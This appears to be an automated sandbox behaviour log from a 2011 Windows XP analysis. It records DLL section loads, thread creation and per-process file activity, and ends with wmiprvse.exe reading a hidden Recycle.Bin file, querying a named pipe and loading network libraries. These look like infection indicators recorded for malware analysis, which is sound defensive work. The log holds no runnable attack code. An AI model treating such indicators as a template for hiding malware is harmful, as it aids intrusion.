Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254259004
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2254538696
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254539722
Section loaded Path: C:\Program Files\Java\jre6\bin\net.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 77824 Protection: execute Mapped to pid: own pid success or wait 2254567308
Section loaded Path: C:\Program Files\Java\jre6\bin\net.dll Access: query and write and read and execute Type: image Baseaddress: 6D600000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 2254568112
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D600000 Size: 77824 Protection: read write Mapped to pid: own pid object name not found 2254574208
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254574839
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2254601739
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254602359
Section loaded Path: C:\Program Files\Java\jre6\bin\nio.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2254634971
Section loaded Path: C:\Program Files\Java\jre6\bin\nio.dll Access: query and write and read and execute Type: image Baseaddress: 6D620000 Size: 36864 Protection: read write Mapped to pid: own pid success or wait 2254635771
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D620000 Size: 36864 Protection: read write Mapped to pid: own pid object name not found 2254641923
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254642536
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2254670009
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254670615
Section loaded Path: C:\Program Files\Java\jre6\bin\regutils.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 278528 Protection: execute Mapped to pid: own pid success or wait 2254697850
Section loaded Path: C:\Program Files\Java\jre6\bin\regutils.dll Access: query and write and read and execute Type: image Baseaddress: 6D6A0000 Size: 286720 Protection: read write Mapped to pid: own pid success or wait 2254698688
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D6A0000 Size: 286720 Protection: read write Mapped to pid: own pid object name not found 2254704733
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254705344
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2254732959
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254733564
Section loaded Path: C:\Program Files\Java\jre6\bin\verify.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 32768 Protection: execute Mapped to pid: own pid success or wait 2254760403
Section loaded Path: C:\Program Files\Java\jre6\bin\verify.dll Access: query and write and read and execute Type: image Baseaddress: 6D7A0000 Size: 49152 Protection: read write Mapped to pid: own pid success or wait 2254761242
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D7A0000 Size: 49152 Protection: read write Mapped to pid: own pid object name not found 2254767358
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254767973
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2255070187
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2255070828
Section loaded Path: C:\Program Files\Java\jre6\bin\zip.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 49152 Protection: execute Mapped to pid: own pid success or wait 2255097619
Section loaded Path: C:\Program Files\Java\jre6\bin\zip.dll Access: query and write and read and execute Type: image Baseaddress: 6D7E0000 Size: 61440 Protection: read write Mapped to pid: own pid success or wait 2255098416
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D7E0000 Size: 61440 Protection: read write Mapped to pid: own pid object name not found 2255104552
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2255105170
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2255132027
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2255132634
Thread created PID: 508 TID: 3228 EIP: 7C8106F9 Imagepath: C:\Program Files\Java\jre6\bin\jqs.exe Injected: false success or wait 2317647019
Thread created PID: 508 TID: 3320 EIP: 7C8106F9 Imagepath: C:\Program Files\Java\jre6\bin\jqs.exe Injected: false success or wait 2318766108
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2318768230
Section loaded Path: C:\Program Files\Java\jre6\bin\client\classes.jsa Access: query and read Type: commit Baseaddress: 10B0000 Size: 13369344 Protection: readonly Mapped to pid: own pid success or wait 2369673500
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 10B0000 Size: 13369344 Protection: readonly Mapped to pid: own pid object name not found 2369674456
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2369676129
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2369909432
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2369911212
Section loaded Path: C:\Program Files\Java\jre6\bin\awt.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 1208320 Protection: execute Mapped to pid: own pid success or wait 2386434046
Section loaded Path: C:\Program Files\Java\jre6\bin\awt.dll Access: query and write and read and execute Type: image Baseaddress: 6D000000 Size: 1351680 Protection: read write Mapped to pid: own pid success or wait 2386434867
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D000000 Size: 1351680 Protection: read write Mapped to pid: own pid object name not found 2386441453
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2386442074
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2386475004
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2386475622
Section loaded Path: C:\Program Files\Java\jre6\bin\client\jvm.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 2695168 Protection: execute Mapped to pid: own pid success or wait 2386503152
Section loaded Path: C:\Program Files\Java\jre6\bin\client\jvm.dll Access: query and write and read and execute Type: image Baseaddress: 6D7F0000 Size: 2777088 Protection: read write Mapped to pid: own pid success or wait 2386503995
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D7F0000 Size: 2777088 Protection: read write Mapped to pid: own pid object name not found 2386510483
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2386511089
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2386547674
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2386548296
Section loaded Path: C:\Program Files\Java\jre6\bin\dcpr.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 143360 Protection: execute Mapped to pid: own pid success or wait 2386575786
Section loaded Path: C:\Program Files\Java\jre6\bin\dcpr.dll Access: query and write and read and execute Type: image Baseaddress: 6D1A0000 Size: 143360 Protection: read write Mapped to pid: own pid success or wait 2386576578
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D1A0000 Size: 143360 Protection: read write Mapped to pid: own pid object name not found 2386583091
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2386583709
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2386863458
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2386864070
Section loaded Path: C:\Program Files\Java\jre6\bin\deploy.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 77824 Protection: execute Mapped to pid: own pid success or wait 2386892563
Section loaded Path: C:\Program Files\Java\jre6\bin\deploy.dll Access: query and write and read and execute Type: image Baseaddress: 6D1D0000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 2386893389
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D1D0000 Size: 77824 Protection: read write Mapped to pid: own pid object name not found 2386899413
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2386900023
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2386927430
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2386928071
Section loaded Path: C:\Program Files\Java\jre6\bin\fontmanager.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 323584 Protection: execute Mapped to pid: own pid success or wait 2386955502
Section loaded Path: C:\Program Files\Java\jre6\bin\fontmanager.dll Access: query and write and read and execute Type: image Baseaddress: 6D230000 Size: 323584 Protection: read write Mapped to pid: own pid success or wait 2386956337
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D230000 Size: 323584 Protection: read write Mapped to pid: own pid object name not found 2386962414
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2386963022
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2386991079
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2386991686
Section loaded Path: C:\Program Files\Java\jre6\bin\hpi.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 16384 Protection: execute Mapped to pid: own pid success or wait 2387018826
Section loaded Path: C:\Program Files\Java\jre6\bin\hpi.dll Access: query and write and read and execute Type: image Baseaddress: 6D280000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2387019618
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D280000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2387025651
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2387026592
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2387053141
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2387059743
Section loaded Path: C:\Program Files\Java\jre6\bin\java.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 2387086904
Section loaded Path: C:\Program Files\Java\jre6\bin\java.dll Access: query and write and read and execute Type: image Baseaddress: 6D320000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 2387087696
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D320000 Size: 126976 Protection: read write Mapped to pid: own pid object name not found 2387093667
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2387094281
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2387423645
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2387424251
Section loaded Path: C:\Program Files\Java\jre6\bin\javaw.exe Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 147456 Protection: execute Mapped to pid: own pid success or wait 2387452884
Section loaded Path: C:\Program Files\Java\jre6\bin\javaw.exe Access: query and write and read and execute Type: image Baseaddress: 10B0000 Size: 147456 Protection: read write Mapped to pid: own pid conflicting addresses 2387453682
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 10B0000 Size: 147456 Protection: read write Mapped to pid: own pid object name not found 2387459940
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2387460532
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2387486570
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2387487168
Section loaded Path: C:\Program Files\Java\jre6\bin\jp2native.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 8192 Protection: execute Mapped to pid: own pid success or wait 2387519171
Section loaded Path: C:\Program Files\Java\jre6\bin\jp2native.dll Access: query and write and read and execute Type: image Baseaddress: 6D420000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 2387519969
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D420000 Size: 24576 Protection: read write Mapped to pid: own pid object name not found 2387525700
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2387526309
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2387552423
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2387553000
Section loaded Path: C:\Program Files\Java\jre6\bin\jpeg.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 151552 Protection: execute Mapped to pid: own pid success or wait 2387579097
Section loaded Path: C:\Program Files\Java\jre6\bin\jpeg.dll Access: query and write and read and execute Type: image Baseaddress: 6D440000 Size: 151552 Protection: read write Mapped to pid: own pid success or wait 2387579857
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D440000 Size: 151552 Protection: read write Mapped to pid: own pid object name not found 2387586091
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2387586678
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2389705962
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2389706556
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2389734692
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2389735265
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2389762636
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2389763251
Section loaded Path: C:\Program Files\Java\jre6\bin\net.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 77824 Protection: execute Mapped to pid: own pid success or wait 2389789865
Section loaded Path: C:\Program Files\Java\jre6\bin\net.dll Access: query and write and read and execute Type: image Baseaddress: 6D600000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 2389790625
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D600000 Size: 77824 Protection: read write Mapped to pid: own pid object name not found 2389796590
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2389797177
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2389823968
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2389824552
Section loaded Path: C:\Program Files\Java\jre6\bin\nio.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2389851099
Section loaded Path: C:\Program Files\Java\jre6\bin\nio.dll Access: query and write and read and execute Type: image Baseaddress: 6D620000 Size: 36864 Protection: read write Mapped to pid: own pid success or wait 2389851890
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D620000 Size: 36864 Protection: read write Mapped to pid: own pid object name not found 2389858006
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2389858591
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2390204425
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2390205107
Section loaded Path: C:\Program Files\Java\jre6\bin\regutils.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 278528 Protection: execute Mapped to pid: own pid success or wait 2390232927
Section loaded Path: C:\Program Files\Java\jre6\bin\regutils.dll Access: query and write and read and execute Type: image Baseaddress: 6D6A0000 Size: 286720 Protection: read write Mapped to pid: own pid success or wait 2390233729
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D6A0000 Size: 286720 Protection: read write Mapped to pid: own pid object name not found 2390239486
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2390240077
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2390268277
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2390268872
Section loaded Path: C:\Program Files\Java\jre6\bin\verify.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 32768 Protection: execute Mapped to pid: own pid success or wait 2390294711
Section loaded Path: C:\Program Files\Java\jre6\bin\verify.dll Access: query and write and read and execute Type: image Baseaddress: 6D7A0000 Size: 49152 Protection: read write Mapped to pid: own pid success or wait 2390295506
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D7A0000 Size: 49152 Protection: read write Mapped to pid: own pid object name not found 2390301450
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2390302038
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2390328477
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2390329052
Section loaded Path: C:\Program Files\Java\jre6\bin\zip.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 49152 Protection: execute Mapped to pid: own pid success or wait 2390355507
Section loaded Path: C:\Program Files\Java\jre6\bin\zip.dll Access: query and write and read and execute Type: image Baseaddress: 6D7E0000 Size: 61440 Protection: read write Mapped to pid: own pid success or wait 2390356277
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D7E0000 Size: 61440 Protection: read write Mapped to pid: own pid object name not found 2390362069
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2390362654
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2390388446
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2390389072
Analysis File: alg.exe PID: 1988 Parent PID: 1636
Sections
+ General
Start time: 05:48:13
Start date: 01/12/2011
Path: C:\WINDOWS\system32\alg.exe
Commandline: C:\WINDOWS\System32\alg.exe
Imagebase: 0x1000000
File size: 44544 bytes
MD5 hash: 8C515081584A38AA007909CD02020B3D
Chronological sections
Operation Data Completion Time
Analysis File: wscntfy.exe PID: 236 Parent PID: 1636
Sections
+ General
Start time: 05:48:13
Start date: 01/12/2011
Path: C:\WINDOWS\system32\wscntfy.exe
Commandline: C:\WINDOWS\system32\wscntfy.exe
Imagebase: 0x1000000
File size: 13824 bytes
MD5 hash: F92E1076C42FCD6DB3D72D8CFE9816D5
Chronological sections
Operation Data Completion Time
Analysis File: msiexec.exe PID: 724 Parent PID: 1636
Sections
+ General
Start time: 05:48:13
Start date: 01/12/2011
Path: C:\WINDOWS\system32\msiexec.exe
Commandline: C:\WINDOWS\system32\msiexec.exe /V
Imagebase: 0x1000000
File size: 78848 bytes
MD5 hash: 5879D691E842574A20FE63817CB76DF9
Chronological sections
Operation Data Completion Time
Analysis File: wmiprvse.exe PID: 1120 Parent PID: 1636
+ Sections
+ General
Start time: 05:48:14
Start date: 01/12/2011
Path: C:\WINDOWS\system32\wbem\wmiprvse.exe
Commandline: C:\WINDOWS\system32\wbem\wmiprvse.exe -Embedding
Imagebase: 0x1000000
File size: 227840 bytes
MD5 hash: 798A9E6828997EEF4517ADA8A2259831
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 5 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BAF4E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 11 BAD6A36
C:\WINDOWS\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
\pipe\globpluginspipe read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 BADD812
+ File read
File Path Offset Length Value Completion Count Source Address
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BAE818F
Section Activities:
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\CRYPT32.dll write and read and execute unknown 77920000 995328 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1 BAE50FD
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 BAE50FD
\KnownDlls\Normaliz.dll write and read and execute unknown C10000 36864 own pid read write conflicting addresses 1 BAE50FD
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 BAE50FD
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSIMG32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown E80000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit E80000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
